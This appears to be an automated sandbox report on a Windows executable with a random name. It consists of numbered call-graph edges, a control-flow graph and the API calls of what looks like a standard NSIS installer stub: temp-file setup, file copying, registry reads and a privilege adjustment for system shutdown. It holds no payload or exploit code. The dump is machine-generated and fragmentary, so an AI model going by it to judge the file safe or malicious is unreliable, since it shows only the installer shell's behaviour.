3846->3856 3847 402f83 3849 403242 ReadFile 3847->3849 3848 402fb5 4017 403027 3848->4017 3851 402f8e 3849->3851 3851->3842 3851->3856 3852 402d8a 6 API calls 3852->3855 3853 402fc1 3853->3853 3854 402ffe SetFilePointer 3853->3854 3853->3856 3854->3856 3855->3838 3855->3844 3855->3852 3855->3856 4037 403242 3855->4037 3856->3744 3858 40642b 5 API calls 3857->3858 3859 4038b2 3858->3859 3860 4038b8 GetUserDefaultUILanguage 3859->3860 3861 4038ca 3859->3861 4061 405f9c wsprintfW 3860->4061 4078 405f22 RegOpenKeyExW 3861->4078 3864 4038c8 4062 403b74 3864->4062 3866 403919 lstrcatW 3866->3864 3867 405f22 3 API calls 3867->3866 3870 405b11 18 API calls 3871 40394b 3870->3871 3872 4039df 3871->3872 3875 405f22 3 API calls 3871->3875 3873 405b11 18 API calls 3872->3873 3874 4039e5 3873->3874 3877 4039f5 LoadImageW 3874->3877 3878 406077 18 API calls 3874->3878 3876 40397d 3875->3876 3876->3872 3881 40399e lstrlenW 3876->3881 3885 405a36 CharNextW 3876->3885 3879 403a9b 3877->3879 3880 403a1c RegisterClassW 3877->3880 3878->3877 3884 40140b 2 API calls 3879->3884 3882 403a52 SystemParametersInfoW CreateWindowExW 3880->3882 3883 403aa5 3880->3883 3886 4039d2 3881->3886 3887 4039ac lstrcmpiW 3881->3887 3882->3879 3883->3799 3888 403aa1 3884->3888 3889 40399b 3885->3889 3891 405a09 3 API calls 3886->3891 3887->3886 3890 4039bc GetFileAttributesW 3887->3890 3888->3883 3893 403b74 19 API calls 3888->3893 3889->3881 3892 4039c8 3890->3892 3894 4039d8 3891->3894 3892->3886 3895 405a55 2 API calls 3892->3895 3896 403ab2 3893->3896 4083 406055 lstrcpynW 3894->4083 3895->3886 3898 403b41 3896->3898 3899 403abe ShowWindow 3896->3899 4071 405287 OleInitialize 3898->4071 3901 4063bf 3 API calls 3899->3901 3902 403ad6 3901->3902 3904 403ae4 GetClassInfoW 3902->3904 3906 4063bf 3 API calls 3902->3906 3903 403b47 3905 403b63 3903->3905 3910 403b4b 3903->3910 3908 403af8 GetClassInfoW RegisterClassW 3904->3908 3909 403b0e DialogBoxParamW 3904->3909 3907 40140b 2 API calls 3905->3907 3906->3904 3907->3883 3908->3909 3911 40140b 2 API calls 3909->3911 3910->3883 3912 40140b 2 API calls 3910->3912 3911->3883 3912->3883 3913->3749 4092 406055 lstrcpynW 3914->4092 3916 405b22 4093 405ab4 CharNextW CharNextW 3916->4093 3919 4035c3 3919->3799 3928 406055 lstrcpynW 3919->3928 3920 4062e9 5 API calls 3921 405b38 3920->3921 3921->3919 3922 405b69 lstrlenW 3921->3922 3927 405a55 2 API calls 3921->3927 4099 406398 FindFirstFileW 3921->4099 3922->3921 3923 405b74 3922->3923 3924 405a09 3 API calls 3923->3924 3926 405b79 GetFileAttributesW 3924->3926 3926->3919 3927->3922 3928->3782 3929->3786 3931 4037dc 3930->3931 3932 4037ce CloseHandle 3930->3932 4102 403809 3931->4102 3932->3931 3938 4057af 3937->3938 3939 403616 ExitProcess 3938->3939 3940 4057c3 MessageBoxIndirectW 3938->3940 3940->3939 3942 40642b 5 API calls 3941->3942 3943 403623 lstrcatW 3942->3943 3943->3773 3943->3774 3945 403665 3944->3945 3946 4056d4 GetLastError 3944->3946 3945->3788 3946->3945 3947 4056e3 SetFileSecurityW 3946->3947 3947->3945 3948 4056f9 GetLastError 3947->3948 3948->3945 3950 405710 3949->3950 3951 405714 GetLastError 3949->3951 3950->3788 3951->3950 3952->3789 3953->3801 3963 406084 3954->3963 3955 4062cf 3956 4036c6 DeleteFileW 3955->3956 4161 406055 lstrcpynW 3955->4161 3956->3795 3956->3801 3958 406137 GetVersion 3958->3963 3959 40629d lstrlenW 3959->3963 3962 406077 10 API calls 3962->3959 3963->3955 3963->3958 3963->3959 3963->3962 3964 405f22 3 API calls 3963->3964 3965 4061b2 GetSystemDirectoryW 3963->3965 3966 4061c5 GetWindowsDirectoryW 3963->3966 3967 4062e9 5 API calls 3963->3967 3968 4061f9 SHGetSpecialFolderLocation 3963->3968 3969 406077 10 API calls 3963->3969 3970 40623e lstrcatW 3963->3970 4159 405f9c wsprintfW 3963->4159 4160 406055 lstrcpynW 3963->4160 3964->3963 3965->3963 3966->3963 3967->3963 3968->3963 3971 406211 SHGetPathFromIDListW CoTaskMemFree 3968->3971 3969->3963 3970->3963 3971->3963 3973 405f17 3972->3973 3974 405f0a 3972->3974 3973->3801 4162 405d84 lstrcpyW 3974->4162 3977 405774 3976->3977 3978 405768 CloseHandle 3976->3978 3977->3801 3978->3977 3980 401389 2 API calls 3979->3980 3981 401420 3980->3981 3981->3759 3988 4062f6 3982->3988 3983 40636c 3984 406371 CharPrevW 3983->3984 3986 406392 3983->3986 3984->3983 3985 40635f CharNextW 3985->3983 3985->3988 3986->3822 3987 405a36 CharNextW 3987->3988 3988->3983 3988->3985 3988->3987 3989 40634b CharNextW 3988->3989 3990 40635a CharNextW 3988->3990 3989->3988 3990->3985 3992 40328d 3991->3992 3993 405a25 lstrcatW 3991->3993 3992->3825 3993->3992 3995 405c66 GetTickCount GetTempFileNameW 3994->3995 3996 40329e 3995->3996 3997 405c9c 3995->3997 3996->3736 3997->3995 3997->3996 3998->3831 3999->3833 4001 405a63 4000->4001 4002 402e5a 4001->4002 4003 405a69 CharPrevW 4001->4003 4004 406055 lstrcpynW 4002->4004 4003->4001 4003->4002 4004->3837 4006 402d93 4005->4006 4007 402dab 4005->4007 4010 402da3 4006->4010 4011 402d9c DestroyWindow 4006->4011 4008 402db3 4007->4008 4009 402dbb GetTickCount 4007->4009 4041 406467 4008->4041 4013 402dc9 CreateDialogParamW ShowWindow 4009->4013 4014 402dec 4009->4014 4010->3840 4011->4010 4013->4014 4014->3840 4016->3848 4018 403040 4017->4018 4019 40306e 4018->4019 4058 403258 SetFilePointer 4018->4058 4021 403242 ReadFile 4019->4021 4022 403079 4021->4022 4023 4031db 4022->4023 4024 40308b GetTickCount 4022->4024 4032 4031c5 4022->4032 4025 40321d 4023->4025 4030 4031df 4023->4030 4024->4032 4036 4030da 4024->4036 4026 403242 ReadFile 4025->4026 4026->4032 4027 403242 ReadFile 4027->4036 4028 403242 ReadFile 4028->4030 4029 405cdc WriteFile 4029->4030 4030->4028 4030->4029 4030->4032 4031 403130 GetTickCount 4031->4036 4032->3853 4033 403155 MulDiv wsprintfW 4045 4051b4 4033->4045 4036->4027 4036->4031 4036->4032 4036->4033 4056 405cdc WriteFile 4036->4056 4059 405cad ReadFile 4037->4059 4040->3847 4042 406484 PeekMessageW 4041->4042 4043 402db9 4042->4043 4044 40647a DispatchMessageW 4042->4044 4043->3840 4044->4042 4046 4051cf 4045->4046 4054 405271 4045->4054 4047 4051eb lstrlenW 4046->4047 4048 406077 18 API calls 4046->4048 4049 405214 4047->4049 4050 4051f9 lstrlenW 4047->4050 4048->4047 4052 405227 4049->4052 4053 40521a SetWindowTextW 4049->4053 4051 40520b lstrcatW 4050->4051 4050->4054 4051->4049 4052->4054 4055 40522d SendMessageW SendMessageW SendMessageW 4052->4055 4053->4052 4054->4036 4055->4054 4057 405cfa 4056->4057 4057->4036 4058->4019 4060 403255 4059->4060 4060->3855 4061->3864 4063 403b88 4062->4063 4084 405f9c wsprintfW 4063->4084 4065 403bf9 4066 406077 18 API calls 4065->4066 4067 403c05 SetWindowTextW 4066->4067 4068 403c21 4067->4068 4069 403929 4067->4069 4068->4069 4070 406077 18 API calls 4068->4070 4069->3870 4070->4068 4085 404165 4071->4085 4073 4052aa 4077 4052d1 4073->4077 4088 401389 4073->4088 4074 404165 SendMessageW 4075 4052e3 OleUninitialize 4074->4075 4075->3903 4077->4074 4079 4038fa 4078->4079 4080 405f56 RegQueryValueExW 4078->4080 4079->3866 4079->3867 4081 405f77 RegCloseKey 4080->4081 4081->4079 4083->3872 4084->4065 4086 40417d 4085->4086 4087 40416e SendMessageW 4085->4087 4086->4073 4087->4086 4090 401390 4088->4090 4089 4013fe 4089->4073 4090->4089 4091 4013cb MulDiv SendMessageW 4090->4091 4091->4090 4092->3916 4094 405ad1 4093->4094 4095 405ae3 4093->4095 4094->4095 4096 405ade CharNextW 4094->4096 4097 405a36 CharNextW 4095->4097 4098 405b07 4095->4098 4096->4098 4097->4095 4098->3919 4098->3920 4100 4063b9 4099->4100 4101 4063ae FindClose 4099->4101 4100->3921 4101->4100 4103 403817 4102->4103 4104 4037e1 4103->4104 4105 40381c FreeLibrary GlobalFree 4103->4105 4106 405846 4104->4106 4105->4104 4105->4105 4107 405b11 18 API calls 4106->4107 4108 405866 4107->4108 4109 405885 4108->4109 4110 40586e DeleteFileW 4108->4110 4112 4059b0 4109->4112 4146 406055 lstrcpynW 4109->4146 4111 4035f6 OleUninitialize 4110->4111 4111->3755 4111->3756 4112->4111 4117 406398 2 API calls 4112->4117 4114 4058ab 4115 4058b1 lstrcatW 4114->4115 4116 4058be 4114->4116 4118 4058c4 4115->4118 4119 405a55 2 API calls 4116->4119 4122 4059ca 4117->4122 4120 4058d4 lstrcatW 4118->4120 4121 4058ca 4118->4121 4119->4118 4123 4058df lstrlenW FindFirstFileW 4120->4123 4121->4120 4121->4123 4122->4111 4124 4059ce 4122->4124 4125 405901 4123->4125 4126 4059a5 4123->4126 4127 405a09 3 API calls 4124->4127 4129 405988 FindNextFileW 4125->4129 4139 405846 62 API calls 4125->4139 4141 4051b4 25 API calls 4125->4141 4143 4051b4 25 API calls 4125->4143 4145 405ef6 38 API calls 4125->4145 4147 406055 lstrcpynW 4125->4147 4148 4057fe 4125->4148 4126->4112 4128 4059d4 4127->4128 4130 4057fe 5 API calls 4128->4130 4129->4125 4133 40599e FindClose 4129->4133 4132 4059e0 4130->4132 4134 4059e4 4132->4134 4135 4059fa 4132->4135 4133->4126 4134->4111 4138 4051b4 25 API calls 4134->4138 4136 4051b4 25 API calls 4135->4136 4136->4111 4140 4059f1 4138->4140 4139->4125 4142 405ef6 38 API calls 4140->4142 4141->4129 4144 4059f8 4142->4144 4143->4125 4144->4111 4145->4125 4146->4114 4147->4125 4156 405c05 GetFileAttributesW 4148->4156 4151 405821 DeleteFileW 4154 405827 4151->4154 4152 405819 RemoveDirectoryW 4152->4154 4153 40582b 4153->4125 4154->4153 4155 405837 SetFileAttributesW 4154->4155 4155->4153 4157 40580a 4156->4157 4158 405c17 SetFileAttributesW 4156->4158 4157->4151 4157->4152 4157->4153 4158->4157 4159->3963 4160->3963 4161->3956 4163 405dd2 GetShortPathNameW 4162->4163 4164 405dac 4162->4164 4166 405ef1 4163->4166 4167 405de7 4163->4167 4189 405c2a GetFileAttributesW CreateFileW 4164->4189 4166->3973 4167->4166 4169 405def wsprintfA 4167->4169 4168 405db6 CloseHandle GetShortPathNameW 4168->4166 4170 405dca 4168->4170 4171 406077 18 API calls 4169->4171 4170->4163 4170->4166 4172 405e17 4171->4172 4190 405c2a GetFileAttributesW CreateFileW 4172->4190 4174 405e24 4174->4166 4175 405e33 GetFileSize GlobalAlloc 4174->4175 4176 405e55 4175->4176 4177 405eea CloseHandle 4175->4177 4178 405cad ReadFile 4176->4178 4177->4166 4179 405e5d 4178->4179 4179->4177 4191 405b8f lstrlenA 4179->4191 4182 405e74 lstrcpyA 4185 405e96 4182->4185 4183 405e88 4184 405b8f 4 API calls 4183->4184 4184->4185 4186 405ecd SetFilePointer 4185->4186 4187 405cdc WriteFile 4186->4187 4188 405ee3 GlobalFree 4187->4188 4188->4177 4189->4168 4190->4174 4192 405bd0 lstrlenA 4191->4192 4193 405bd8 4192->4193 4194 405ba9 lstrcmpiA 4192->4194 4193->4182 4193->4183 4194->4193 4195 405bc7 CharNextA 4194->4195 4195->4192 5181 100010e1 5184 10001111 5181->5184 5182 100011d8 GlobalFree 5183 100012ba 2 API calls 5183->5184 5184->5182 5184->5183 5185 100011d3 5184->5185 5186 10001272 2 API calls 5184->5186 5187 10001164 GlobalAlloc 5184->5187 5188 100011f8 GlobalFree 5184->5188 5189 100011c4 GlobalFree 5184->5189 5190 100012e1 lstrcpyW 5184->5190 5185->5182 5186->5189 5187->5184 5188->5184 5189->5184 5190->5184 5191 401ca3 5192 402ba2 18 API calls 5191->5192 5193 401ca9 IsWindow 5192->5193 5194 401a05 5193->5194 5195 402a27 SendMessageW 5196 402a41 InvalidateRect 5195->5196 5197 402a4c 5195->5197 5196->5197 5198 405128 5199 405138 5198->5199 5200 40514c 5198->5200 5202 405195 5199->5202 5203 40513e 5199->5203 5201 405154 IsWindowVisible 5200->5201 5209 40516b 5200->5209 5201->5202 5204 405161 5201->5204 5205 40519a CallWindowProcW 5202->5205 5206 404165 SendMessageW 5203->5206 5211 404a7e SendMessageW 5204->5211 5208 405148 5205->5208 5206->5208 5209->5205 5216 404afe 5209->5216 5212 404aa1 GetMessagePos ScreenToClient SendMessageW 5211->5212 5213 404add SendMessageW 5211->5213 5214 404ad5 5212->5214 5215 404ada 5212->5215 5213->5214 5214->5209 5215->5213 5225 406055 lstrcpynW 5216->5225 5218 404b11 5226 405f9c wsprintfW 5218->5226 5220 404b1b 5221 40140b 2 API calls 5220->5221 5222 404b24 5221->5222 5227 406055 lstrcpynW 5222->5227 5224 404b2b 5224->5202 5225->5218 5226->5220 5227->5224 4581 40242a 4592 402cc9 4581->4592 4583 402434 4584 402bbf 18 API calls 4583->4584 4585 40243d 4584->4585 4586 402448 RegQueryValueExW 4585->4586 4587 40281e 4585->4587 4588 402468 4586->4588 4591 40246e RegCloseKey 4586->4591 4588->4591 4596 405f9c wsprintfW 4588->4596 4591->4587 4593 402bbf 18 API calls 4592->4593 4594 402ce2 4593->4594 4595 402cf0 RegOpenKeyExW 4594->4595 4595->4583 4596->4591 5228 40422d lstrcpynW lstrlenW 5229 40172d 5230 402bbf 18 API calls 5229->5230 5231 401734 SearchPathW 5230->5231 5232 40174f 5231->5232 5233 404b30 GetDlgItem GetDlgItem 5234 404b82 7 API calls 5233->5234 5237 404d9b 5233->5237 5235 404c25 DeleteObject 5234->5235 5236 404c18 SendMessageW 5234->5236 5238 404c2e 5235->5238 5236->5235 5244 404e7f 5237->5244 5252 404a7e 5 API calls 5237->5252 5264 404e0c 5237->5264 5239 404c65 5238->5239 5241 406077 18 API calls 5238->5241 5242 404119 19 API calls 5239->5242 5240 404f2b 5245 404f35 SendMessageW 5240->5245 5251 404f3d 5240->5251 5246 404c47 SendMessageW SendMessageW 5241->5246 5243 404c79 5242->5243 5247 404119 19 API calls 5243->5247 5244->5240 5248 404ed8 SendMessageW 5244->5248 5273 404d8e 5244->5273 5245->5251 5246->5238 5265 404c87 5247->5265 5254 404eed SendMessageW 5248->5254 5248->5273 5249 404180 8 API calls 5255 405121 5249->5255 5250 404e71 SendMessageW 5250->5244 5256 404f56 5251->5256 5257 404f4f ImageList_Destroy 5251->5257 5261 404f66 5251->5261 5252->5264 5253 4050d5 5262 4050e7 ShowWindow GetDlgItem ShowWindow 5253->5262 5253->5273 5260 404f00 5254->5260 5258 404f5f GlobalFree 5256->5258 5256->5261 5257->5256 5258->5261 5259 404d5c GetWindowLongW SetWindowLongW 5263 404d75 5259->5263 5270 404f11 SendMessageW 5260->5270 5261->5253 5276 404afe 4 API calls 5261->5276 5279 404fa1 5261->5279 5262->5273 5266 404d93 5263->5266 5267 404d7b ShowWindow 5263->5267 5264->5244 5264->5250 5265->5259 5269 404cd7 SendMessageW 5265->5269 5271 404d56 5265->5271 5274 404d13 SendMessageW 5265->5274 5275 404d24 SendMessageW 5265->5275 5285 40414e SendMessageW 5266->5285 5284 40414e SendMessageW 5267->5284 5269->5265 5270->5240 5271->5259 5271->5263 5273->5249 5274->5265 5275->5265 5276->5279 5277 4050ab InvalidateRect 5277->5253 5278 4050c1 5277->5278 5286 404a39 5278->5286 5280 404fcf SendMessageW 5279->5280 5283 404fe5 5279->5283 5280->5283 5282 405059 SendMessageW SendMessageW 5282->5283 5283->5277 5283->5282 5284->5273 5285->5237 5289 404970 5286->5289 5288 404a4e 5288->5253 5290 404989 5289->5290 5291 406077 18 API calls 5290->5291 5292 4049ed 5291->5292 5293 406077 18 API calls 5292->5293 5294 4049f8 5293->5294 5295 406077 18 API calls 5294->5295 5296 404a0e lstrlenW wsprintfW SetDlgItemTextW 5295->5296 5296->5288 5297 4045b4 5298 4045e0 5297->5298 5299 4045f1 5297->5299 5358 40577e GetDlgItemTextW 5298->5358 5301 4045fd GetDlgItem 5299->5301 5304 40465c 5299->5304 5303 404611 5301->5303 5302 4045eb 5306 4062e9 5 API calls 5302->5306 5308 404625 SetWindowTextW 5303->5308 5313 405ab4 4 API calls 5303->5313 5305 404740 5304->5305 5309 406077 18 API calls 5304->5309 5356 4048ef 5304->5356 5305->5356 5360 40577e GetDlgItemTextW 5305->5360 5306->5299 5311 404119 19 API calls 5308->5311 5314 4046d0 SHBrowseForFolderW 5309->5314 5310 404770 5315 405b11 18 API calls 5310->5315 5316 404641 5311->5316 5312 404180 8 API calls 5317 404903 5312->5317 5318 40461b 5313->5318 5314->5305 5319 4046e8 CoTaskMemFree 5314->5319 5320 404776 5315->5320 5321 404119 19 API calls 5316->5321 5318->5308 5322 405a09 3 API calls 5318->5322 5323 405a09 3 API calls 5319->5323 5361 406055 lstrcpynW 5320->5361 5324 40464f 5321->5324 5322->5308 5325 4046f5 5323->5325 5359 40414e SendMessageW 5324->5359 5328 40472c SetDlgItemTextW 5325->5328 5333 406077 18 API calls 5325->5333 5328->5305 5329 404655 5331 40642b 5 API calls 5329->5331 5330 40478d 5332 40642b 5 API calls 5330->5332 5331->5304 5340 404794 5332->5340 5334 404714 lstrcmpiW 5333->5334 5334->5328 5337 404725 lstrcatW 5334->5337 5335 4047d5 5362 406055 lstrcpynW 5335->5362 5337->5328 5338 4047dc 5339 405ab4 4 API calls 5338->5339 5341 4047e2 GetDiskFreeSpaceW 5339->5341 5340->5335 5343 405a55 2 API calls 5340->5343 5345 40482d 5340->5345 5344 404806 MulDiv 5341->5344 5341->5345 5343->5340 5344->5345 5346 40489e 5345->5346 5347 404a39 21 API calls 5345->5347 5348 4048c1 5346->5348 5350 40140b 2 API calls 5346->5350 5349 40488b 5347->5349 5363 40413b KiUserCallbackDispatcher 5348->5363 5352 4048a0 SetDlgItemTextW 5349->5352 5353 404890 5349->5353 5350->5348 5352->5346 5355 404970 21 API calls 5353->5355 5354 4048dd 5354->5356 5364 404549 5354->5364 5355->5346 5356->5312 5358->5302 5359->5329 5360->5310 5361->5330 5362->5338 5363->5354 5365 404557 5364->5365 5366 40455c SendMessageW 5364->5366 5365->5366 5366->5356 5367 4027b4 5368 4027ba 5367->5368 5369 4027c2 FindClose 5368->5369 5370 402a4c 5368->5370 5369->5370 5371 4042b6 5372 4042ce 5371->5372 5376 4043e8 5371->5376 5377 404119 19 API calls 5372->5377 5373 404452 5374 404524 5373->5374 5375 40445c GetDlgItem 5373->5375 5382 404180 8 API calls 5374->5382 5378 4044e5 5375->5378 5379 404476 5375->5379 5376->5373 5376->5374 5380 404423 GetDlgItem SendMessageW 5376->5380 5381 404335 5377->5381 5378->5374 5387 4044f7 5378->5387 5379->5378 5386 40449c 6 API calls 5379->5386 5402 40413b KiUserCallbackDispatcher 5380->5402 5384 404119 19 API calls 5381->5384 5385 40451f 5382->5385 5389 404342 CheckDlgButton 5384->5389 5386->5378 5390 40450d 5387->5390 5391 4044fd SendMessageW 5387->5391 5388 40444d 5393 404549 SendMessageW 5388->5393 5400 40413b KiUserCallbackDispatcher 5389->5400 5390->5385 5392 404513 SendMessageW 5390->5392 5391->5390 5392->5385 5393->5373 5395 404360 GetDlgItem 5401 40414e SendMessageW 5395->5401 5397 404376 SendMessageW 5398 404393 GetSysColor 5397->5398 5399 40439c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5397->5399 5398->5399 5399->5385 5400->5395 5401->5397 5402->5388 4674 401b37 4675 401b88 4674->4675 4677 401b44 4674->4677 4678 401bb2 GlobalAlloc 4675->4678 4679 401b8d 4675->4679 4676 401bcd 4680 406077 18 API calls 4676->4680 4689 402288 4676->4689 4677->4676 4682 401b5b 4677->4682 4681 406077 18 API calls 4678->4681 4679->4689 4695 406055 lstrcpynW 4679->4695 4684 402282 4680->4684 4681->4676 4693 406055 lstrcpynW 4682->4693 4687 40579a MessageBoxIndirectW 4684->4687 4686 401b9f GlobalFree 4686->4689 4687->4689 4688 401b6a 4694 406055 lstrcpynW 4688->4694 4691 401b79 4696 406055 lstrcpynW 4691->4696 4693->4688 4694->4691 4695->4686 4696->4689 5403 402537 5404 402562 5403->5404 5405 40254b 5403->5405 5407 402596 5404->5407 5408 402567 5404->5408 5406 402ba2 18 API calls 5405->5406 5415 402552 5406->5415 5410 402bbf 18 API calls 5407->5410 5409 402bbf 18 API calls 5408->5409 5412 40256e WideCharToMultiByte lstrlenA 5409->5412 5411 40259d lstrlenW 5410->5411 5411->5415 5412->5415 5413 4025ca 5414 4025e0 5413->5414 5416 405cdc WriteFile 5413->5416 5415->5413 5415->5414 5417 405d0b 5 API calls 5415->5417 5416->5414 5417->5413 5418 4014b8 5419 4014be 5418->5419 5420 401389 2 API calls 5419->5420 5421 4014c6 5420->5421 4697 4015b9 4698 402bbf 18 API calls 4697->4698 4699 4015c0 4698->4699 4700 405ab4 4 API calls 4699->4700 4710 4015c9 4700->4710 4701 401629 4703 40165b 4701->4703 4704 40162e 4701->4704 4702 405a36 CharNextW 4702->4710 4706 401423 25 API calls 4703->4706 4705 401423 25 API calls 4704->4705 4707 401635 4705->4707 4714 401653 4706->4714 4716 406055 lstrcpynW 4707->4716 4708 405700 2 API calls 4708->4710 4710->4701 4710->4702 4710->4708 4711 40571d 5 API calls 4710->4711 4713 40160f GetFileAttributesW 4710->4713 4715 405683 4 API calls 4710->4715 4711->4710 4712 401642 SetCurrentDirectoryW 4712->4714 4713->4710 4715->4710 4716->4712 5422 10002a7f 5423 10002a97 5422->5423 5424 1000158f 2 API calls 5423->5424 5425 10002ab2 5424->5425

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 4032a0-4032d2 SetErrorMode GetVersion 1 4032d4-4032dc call 40642b 0->1 2 4032e5-403378 call 4063bf * 3 call 40642b * 2 #17 OleInitialize SHGetFileInfoW call 406055 GetCommandLineW call 406055 GetModuleHandleW 0->2 1->2 7 4032de 1->7 20 403382-40339c call 405a36 CharNextW 2->20 21 40337a-403381 2->21 7->2 24 4033a2-4033a8 20->24 25 4034b4-4034ce GetTempPathW call 40326f 20->25 21->20 27 4033b1-4033b7 24->27 28 4033aa-4033af 24->28 32 4034d0-4034ee GetWindowsDirectoryW lstrcatW call 40326f 25->32 33 403526-403540 DeleteFileW call 402dee 25->33 30 4033b9-4033bd 27->30 31 4033be-4033c2 27->31 28->27 28->28 30->31 34 403480-40348d call 405a36 31->34 35 4033c8-4033ce 31->35 32->33 50 4034f0-403520 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 32->50 53 4035f1-403602 call 4037c4 OleUninitialize 33->53 54 403546-40354c 33->54 51 403491-403497 34->51 52 40348f-403490 34->52 36 4033d0-4033d7 35->36 37 4033e8-403421 35->37 41 4033d9-4033dc 36->41 42 4033de 36->42 43 403423-403428 37->43 44 40343e-403478 37->44 41->37 41->42 42->37 43->44 48 40342a-403432 43->48 44->34 49 40347a-40347e 44->49 58 403434-403437 48->58 59 403439 48->59 49->34 60 40349f-4034ad call 406055 49->60 50->33 50->53 51->24 62 40349d 51->62 52->51 71 403728-40372e 53->71 72 403608-403618 call 40579a ExitProcess 53->72 55 4035e1-4035e8 call 40389e 54->55 56 403552-40355d call 405a36 54->56 70 4035ed 55->70 73 4035ab-4035b5 56->73 74 40355f-403594 56->74 58->44 58->59 59->44 63 4034b2 60->63 62->63 63->25 70->53 76 403730-403746 GetCurrentProcess OpenProcessToken 71->76 77 4037ac-4037b4 71->77 81 4035b7-4035c5 call 405b11 73->81 82 40361e-403632 call 40571d lstrcatW 73->82 78 403596-40359a 74->78 84 403748-403776 LookupPrivilegeValueW AdjustTokenPrivileges 76->84 85 40377c-40378a call 40642b 76->85 79 4037b6 77->79 80 4037ba-4037be ExitProcess 77->80 86 4035a3-4035a7 78->86 87 40359c-4035a1 78->87 79->80 81->53 97 4035c7-4035dd call 406055 * 2 81->97 98 403634-40363a lstrcatW 82->98 99 40363f-403659 lstrcatW lstrcmpiW 82->99 84->85 95 403798-4037a3 ExitWindowsEx 85->95 96 40378c-403796 85->96 86->78 92 4035a9 86->92 87->86 87->92 92->73 95->77 100 4037a5-4037a7 call 40140b 95->100 96->95 96->100 97->55 98->99 99->53 102 40365b-40365e 99->102 100->77 103 403660-403665 call 405683 102->103 104 403667 call 405700 102->104 113 40366c-40367a SetCurrentDirectoryW 103->113 104->113 114 403687-4036b0 call 406055 113->114 115 40367c-403682 call 406055 113->115 119 4036b5-4036d1 call 406077 DeleteFileW 114->119 115->114 122 403712-40371a 119->122 123 4036d3-4036e3 CopyFileW 119->123 122->119 124 40371c-403723 call 405ef6 122->124 123->122 125 4036e5-403705 call 405ef6 call 406077 call 405735 123->125 124->53 125->122 134 403707-40370e CloseHandle 125->134 134->122
                                        APIs
                                        • SetErrorMode.KERNELBASE ref: 004032C2
                                        • GetVersion.KERNEL32 ref: 004032C8
                                        • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                        • OleInitialize.OLE32(00000000), ref: 0040331F
                                        • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                        • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                        • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\5WP9WCM8qV.exe",00000000), ref: 00403363
                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\5WP9WCM8qV.exe",00000020), ref: 0040338A
                                          • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                          • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
                                        • DeleteFileW.KERNELBASE(1033), ref: 0040352B
                                          • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                        • OleUninitialize.OLE32(?), ref: 004035F6
                                        • ExitProcess.KERNEL32 ref: 00403618
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\5WP9WCM8qV.exe",00000000,?), ref: 0040362B
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\5WP9WCM8qV.exe",00000000,?), ref: 0040363A
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\5WP9WCM8qV.exe",00000000,?), ref: 00403645
                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\5WP9WCM8qV.exe",00000000,?), ref: 00403651
                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
                                        • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\5WP9WCM8qV.exe,0042AA28,00000001), ref: 004036DB
                                        • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                        • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                        • ExitProcess.KERNEL32 ref: 004037BE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
